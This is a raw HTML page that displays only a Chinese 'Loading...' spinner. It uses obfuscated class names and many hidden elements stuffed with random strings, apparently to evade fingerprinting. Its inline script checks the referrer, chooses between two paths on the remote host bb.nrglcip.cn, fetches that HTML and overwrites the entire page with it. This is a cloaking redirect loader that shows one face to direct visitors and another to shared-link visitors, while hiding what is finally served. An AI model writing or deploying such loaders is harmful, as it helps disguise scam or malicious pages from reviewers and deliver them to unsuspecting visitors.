<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HtoBRULpa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HtoBRULpa .Znce7HA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HtoBRULpa .content {
            line-height: 50px;
            text-align: center
        }

        .HtoBRULpa .img {
            width: 100%
        }

        .HtoBRULpa .TjOm03 {
            text-align: center
        }

        .HtoBRULpa .TjOm03 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HtoBRULpa .TjOm03 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HtoBRULpa .TjOm03 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HtoBRULpa .TjOm03 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HtoBRULpa .TjOm03 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HtoBRULpa .TjOm03 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HtoBRULpa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function F6LmqRB4wch(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ktwvb = F6LmqRB4wch('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ktwvb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ktwvb +".html?a=share";
		}
		
        GsjTGB6DN=url+"#"+new Date().getTime();
        GsjTGB6DN && function() {
            $.get(GsjTGB6DN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >aBEgHUpVtvUlEuULzOxA2VmySPPNuKKXGYYTW8RA2XiOzk6z1is10Z9oEUW3Vu5o13qe6jn7Angb7hbcxV7Yro9kyxYkNF1fWHT</h1>
<span style='display:none'>IGmt5iq9CG5MtiaKAIfZ1WGCQckj62ivRaW85797xUFhd9mC82URIfliy9FvH4vgjAHbfP</span>
<ul style='display:none' >ehYtOi5he14sW7lvnF6HH5nyxsgXQr5g4Arjn8ufFbumSzJd6TxLMhFSUKH6jMDzmX</ul>
<li style='display:none' >qhPRapmOuJ5G2H5r3kINSodMsOqMapNnW5yuslb</li>
<h1 style='display:none' >aBEgHUpVtvUlEuULzOxA2VmySPPNuKKXGYYTW8RA2XiOzk6z1is10Z9oEUW3Vu5o13qe6jn7Angb7hbcxV7Yro9kyxYkNF1fWHT</h1>
<h1 style='display:none' >aBEgHUpVtvUlEuULzOxA2VmySPPNuKKXGYYTW8RA2XiOzk6z1is10Z9oEUW3Vu5o13qe6jn7Angb7hbcxV7Yro9kyxYkNF1fWHT</h1>
<a  href='#' style='display:none'>DTeCgCV0mgbGe88jfTfoV4CA0RYGDkCZk</a>
<div style='display:none'>H5vkgJDIi5jZxj9Et4JiDurqKMtNkoVMdhUlaI</div>
<span style='display:none'>IGmt5iq9CG5MtiaKAIfZ1WGCQckj62ivRaW85797xUFhd9mC82URIfliy9FvH4vgjAHbfP</span><div class="HtoBRULpa">
    <div class="Znce7HA">
        <div class="TjOm03">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>lKupdJNmyoXLNOeFaU5jz</p>
<ul style='display:none' >IuZPsdrJCretZvyjCeULxJWFA</ul>
<div style='display:none'>VSGVSfWf7CUed4BFjsGBYZ27fK5reP0pMaYQ6Un</div></body>
</html>